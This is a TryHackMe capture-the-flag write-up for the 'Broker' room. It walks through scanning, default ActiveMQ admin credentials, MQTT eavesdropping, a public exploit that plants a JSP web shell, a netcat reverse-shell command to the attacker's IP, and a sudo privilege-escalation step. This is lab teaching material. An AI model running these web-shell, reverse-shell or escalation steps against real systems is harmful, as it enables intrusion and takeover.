Broker — TryHackMe
This is the write-up for TryHackMe’s room named Broker. Description says: Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible…They better be careful… Interesting.This room can be found here:
As always let’s scan the target with NMAP to what is running on the target.
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.160.160
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.160.160
PORT STATE SERVICE
22/tcp open ssh
1883/tcp open mqtt
8161/tcp open patrol-snmp
42449/tcp open unknown
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160
└─$ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_ 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
1883/tcp open mqtt?
8161/tcp open http Jetty 7.6.9.v20130131
|_http-title: Apache ActiveMQ
42449/tcp open tcpwrapped
Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)
So from the above NMAP the required ports are: 1883,8161
What is the name of the software they use?
Again NMAP clearly shows the software used is ActiveMQ. Also port 8161 is running HTTP, so let’s check out this via the browser.
Yes it is indeed ActiveMQ. So lets brute force all the directories which might prove useful using ffuf.
└─$ ffuf -u http://10.10.99.191:8161/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c /'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.2.1
________________________________________________:: Method : GET
:: URL : http://10.10.99.191:8161/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________images [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 5968, Words: 2626, Lines: 134]
admin [Status: 401, Size: 1278, Words: 977, Lines: 33]
api [Status: 302, Size: 0, Words: 1, Lines: 1]
styles [Status: 302, Size: 0, Words: 1, Lines: 1]
[Status: 200, Size: 5968, Words: 2626, Lines: 134]
:: Progress: [882184/882184] :: Job [1/1] :: 987 req/sec :: Duration: [0:17:30] :: Errors: 0 ::
/admin looks interesting. Let’s access this page, but it asks for a username and password. Searching around found here that default credentials for Apache ActiveMQ Administration Console are just admin/admin. Tired them and it worked and also noticed a version number i.e. 5.9.0
Which videogame are Paul and Max talking about?
At this point it is clear that we need to talk to the daemon
mqtt running on port 1883(check nmap scans). So searching for a
mqtt client found this:
Also found this link very useful:
But we still need a "topic” for
subscribe() to subscribe to a topic and receive messages. This was found here:
So edited the code from GitHub link and added the topic,IP Address of the Target and the MQTT version which needed to be 3.1:
Ran the code as
Voila! and we are able to see the chat between Paul and Max.Also found the Video game’s name in this chat. Great. Now we need to exploit some vulnerability in this version of ActiveMQ to move forward. Searchsploit revealed a vulnerability which was also applicable for 5.9.0.
Reading more info from this Metasploit module found a link to a CVE for the vulnerability:
For some reason the Metasploit module for exploration doesn't work so search around for any exploit available and found this one on GitHub:
It was pretty simple to run:
python3 ActiveMQ_putshell.py -u http://10.10.120.228:8161
And this put a web shell at http://10.10.120.228:8161/admin/guo.jsp and used it like http://10.10.120.228:8161/admin/guo.jsp?pwd=gshell&shell=whoami to get the Remote Code Execution.
Now to gain a reverse shell tried few payload and this one worked which gave us a reverse. Note start a netcat listener on the attacking machine before executing the reverse shell payload URL and also replace the IP address with your own IP address:
nc 10.8.98.192 9999 -e /bin/sh
Upgrade and Stabilize Shell
Run the following commands on the target to upgrade current shell:
/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
The flag was in the same directory where we got our reverse shell:
sudo -l indicated that we can run
subcribe.py in the
/opt/apache-activemq-5.9.0 directory. Also on this file the current user activemq has write permissions.
So we can easily get root by adding the following code in
subcribe.py using nano as vi was not available on the target:
and then running it with sudo:
We are root and found the root flag at
This was an interesting room and the spying on the chat part was a winner for me. If you like the write-up please clap and follow me.